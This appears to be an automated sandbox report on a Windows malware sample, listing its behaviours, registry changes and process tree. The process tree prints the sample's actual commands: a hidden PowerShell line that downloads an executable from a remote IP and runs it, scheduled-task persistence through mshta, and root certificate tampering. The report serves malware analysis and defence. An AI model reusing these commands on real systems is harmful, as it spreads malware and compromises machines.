e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 5ba84e592b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 e8fc92f40f.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a e8fc92f40f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 5ba84e592b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 5ba84e592b.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3056 schtasks.exe 1776 schtasks.exe 1312 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2180 powershell.exe 2180 powershell.exe 2180 powershell.exe 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 2024 rapes.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 2644 TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE 1760 powershell.exe 264 powershell.exe 1192 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 760 483d2fa8a0d53818306efeb32d3.exe 1028 978898b013.exe 2800 51c7931c48.exe 2800 51c7931c48.exe 2800 51c7931c48.exe 2800 51c7931c48.exe 2328 14107dc962.exe 1360 5ba84e592b.exe 1088 e8fc92f40f.exe 1360 5ba84e592b.exe 1360 5ba84e592b.exe 1360 5ba84e592b.exe 1360 5ba84e592b.exe 1684 4973aedce1.exe 928 bc5700b2c7.exe 1088 e8fc92f40f.exe 1088 e8fc92f40f.exe 1088 e8fc92f40f.exe 1088 e8fc92f40f.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 2836 chrome.exe 2836 chrome.exe 2500 f6a3f4768e.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 3420 dbc71c9fa1.exe 3420 dbc71c9fa1.exe 3280 chrome.exe 3280 chrome.exe 3420 dbc71c9fa1.exe 3420 dbc71c9fa1.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 3892 FvbuInU.exe 3892 FvbuInU.exe 928 bc5700b2c7.exe 928 bc5700b2c7.exe 3892 FvbuInU.exe 3892 FvbuInU.exe 3892 FvbuInU.exe 3892 FvbuInU.exe 3368 OEHBOHk.exe 3876 powershell.exe 3368 OEHBOHk.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3636 SplashWin.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 264 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 3004 51c7931c48.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeDebugPrivilege 2380 taskkill.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeDebugPrivilege 876 taskkill.exe Token: SeDebugPrivilege 2596 taskkill.exe Token: SeDebugPrivilege 1688 taskkill.exe Token: SeDebugPrivilege 2612 taskkill.exe Token: SeDebugPrivilege 1960 firefox.exe Token: SeDebugPrivilege 1960 firefox.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeDebugPrivilege 3420 dbc71c9fa1.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeShutdownPrivilege 3544 powercfg.exe Token: SeShutdownPrivilege 3528 powercfg.exe Token: SeShutdownPrivilege 3552 powercfg.exe Token: SeShutdownPrivilege 3536 powercfg.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeShutdownPrivilege 264 powercfg.exe Token: SeShutdownPrivilege 532 powercfg.exe Token: SeShutdownPrivilege 2564 powercfg.exe Token: SeShutdownPrivilege 2084 powercfg.exe Token: SeLockMemoryPrivilege 4020 explorer.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 1276 0e76db166d.exe 1276 0e76db166d.exe 1276 0e76db166d.exe 2836 chrome.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 1960 firefox.exe 1960 firefox.exe 1960 firefox.exe 1960 firefox.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 3280 chrome.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 1276 0e76db166d.exe 1276 0e76db166d.exe 1276 0e76db166d.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 1960 firefox.exe 1960 firefox.exe 1960 firefox.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe 2500 f6a3f4768e.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2572 wrote to memory of 1672 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 30 PID 2572 wrote to memory of 1672 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 30 PID 2572 wrote to memory of 1672 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 30 PID 2572 wrote to memory of 1672 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 30 PID 2572 wrote to memory of 2380 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 31 PID 2572 wrote to memory of 2380 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 31 PID 2572 wrote to memory of 2380 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 31 PID 2572 wrote to memory of 2380 2572 9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe 31 PID 1672 wrote to memory of 1776 1672 cmd.exe 33 PID 1672 wrote to memory of 1776 1672 cmd.exe 33 PID 1672 wrote to memory of 1776 1672 cmd.exe 33 PID 1672 wrote to memory of 1776 1672 cmd.exe 33 PID 2380 wrote to memory of 2180 2380 mshta.exe 34 PID 2380 wrote to memory of 2180 2380 mshta.exe 34 PID 2380 wrote to memory of 2180 2380 mshta.exe 34 PID 2380 wrote to memory of 2180 2380 mshta.exe 34 PID 2180 wrote to memory of 2772 2180 powershell.exe 36 PID 2180 wrote to memory of 2772 2180 powershell.exe 36 PID 2180 wrote to memory of 2772 2180 powershell.exe 36 PID 2180 wrote to memory of 2772 2180 powershell.exe 36 PID 2772 wrote to memory of 2024 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 37 PID 2772 wrote to memory of 2024 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 37 PID 2772 wrote to memory of 2024 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 37 PID 2772 wrote to memory of 2024 2772 TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE 37 PID 2024 wrote to memory of 808 2024 rapes.exe 40 PID 2024 wrote to memory of 808 2024 rapes.exe 40 PID 2024 wrote to memory of 808 2024 rapes.exe 40 PID 2024 wrote to memory of 808 2024 rapes.exe 40 PID 808 wrote to memory of 1852 808 SvhQA35.exe 42 PID 808 wrote to memory of 1852 808 SvhQA35.exe 42 PID 808 wrote to memory of 1852 808 SvhQA35.exe 42 PID 2024 wrote to memory of 1276 2024 rapes.exe 43 PID 2024 wrote to memory of 1276 2024 rapes.exe 43 PID 2024 wrote to memory of 1276 2024 rapes.exe 43 PID 2024 wrote to memory of 1276 2024 rapes.exe 43 PID 1276 wrote to memory of 2260 1276 0e76db166d.exe 44 PID 1276 wrote to memory of 2260 1276 0e76db166d.exe 44 PID 1276 wrote to memory of 2260 1276 0e76db166d.exe 44 PID 1276 wrote to memory of 2260 1276 0e76db166d.exe 44 PID 1276 wrote to memory of 2800 1276 0e76db166d.exe 45 PID 1276 wrote to memory of 2800 1276 0e76db166d.exe 45 PID 1276 wrote to memory of 2800 1276 0e76db166d.exe 45 PID 1276 wrote to memory of 2800 1276 0e76db166d.exe 45 PID 2800 wrote to memory of 1152 2800 mshta.exe 47 PID 2800 wrote to memory of 1152 2800 mshta.exe 47 PID 2800 wrote to memory of 1152 2800 mshta.exe 47 PID 2800 wrote to memory of 1152 2800 mshta.exe 47 PID 2260 wrote to memory of 1312 2260 cmd.exe 49 PID 2260 wrote to memory of 1312 2260 cmd.exe 49 PID 2260 wrote to memory of 1312 2260 cmd.exe 49 PID 2260 wrote to memory of 1312 2260 cmd.exe 49 PID 2024 wrote to memory of 2840 2024 rapes.exe 50 PID 2024 wrote to memory of 2840 2024 rapes.exe 50 PID 2024 wrote to memory of 2840 2024 rapes.exe 50 PID 2024 wrote to memory of 2840 2024 rapes.exe 50 PID 2840 wrote to memory of 2612 2840 cmd.exe 52 PID 2840 wrote to memory of 2612 2840 cmd.exe 52 PID 2840 wrote to memory of 2612 2840 cmd.exe 52 PID 2840 wrote to memory of 2612 2840 cmd.exe 52 PID 1152 wrote to memory of 2644 1152 powershell.exe 53 PID 1152 wrote to memory of 2644 1152 powershell.exe 53 PID 1152 wrote to memory of 2644 1152 powershell.exe 53 PID 1152 wrote to memory of 2644 1152 powershell.exe 53 PID 2840 wrote to memory of 988 2840 cmd.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe"C:\Users\Admin\AppData\Local\Temp\9a720cb02a041ae9cab65c195b2bd32cf017a89d386c0e2344077eb97d407547.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn zMKRImaJFmJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\CIh2xzNV3.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn zMKRImaJFmJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\CIh2xzNV3.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1776
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\CIh2xzNV3.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE"C:\Users\Admin\AppData\Local\TempVAXN0Q6WR7KCPJARINZCAPWOO4EWUDFL.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Users\Admin\AppData\Local\Temp\onefile_808_133856566404360000\chromium.exeC:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1852
-
-
-
C:\Users\Admin\AppData\Local\Temp\10102580101\0e76db166d.exe"C:\Users\Admin\AppData\Local\Temp\10102580101\0e76db166d.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 5BUGdmaNCxq /tr "mshta C:\Users\Admin\AppData\Local\Temp\hh2sfa4Yp.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 5BUGdmaNCxq /tr "mshta C:\Users\Admin\AppData\Local\Temp\hh2sfa4Yp.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1312
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\hh2sfa4Yp.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE"C:\Users\Admin\AppData\Local\TempZNYAGMANXOY6YFQWOEYDEFQHKJHYFJ2Z.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2644
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10102590121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "fW3iKmaDJtG" /tr "mshta \"C:\Temp\KHPgV2oTf.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3056
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\KHPgV2oTf.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:760
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103110101\978898b013.exe"C:\Users\Admin\AppData\Local\Temp\10103110101\978898b013.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1028 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1600
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103120101\51c7931c48.exe"C:\Users\Admin\AppData\Local\Temp\10103120101\51c7931c48.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\10103120101\51c7931c48.exe"C:\Users\Admin\AppData\Local\Temp\10103120101\51c7931c48.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 5087⤵
- Loads dropped DLL
- Program crash
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103130101\14107dc962.exe"C:\Users\Admin\AppData\Local\Temp\10103130101\14107dc962.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2328 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103140101\5ba84e592b.exe"C:\Users\Admin\AppData\Local\Temp\10103140101\5ba84e592b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
C:\Users\Admin\AppData\Local\Temp\10103150101\e8fc92f40f.exe"C:\Users\Admin\AppData\Local\Temp\10103150101\e8fc92f40f.exe"6⤵
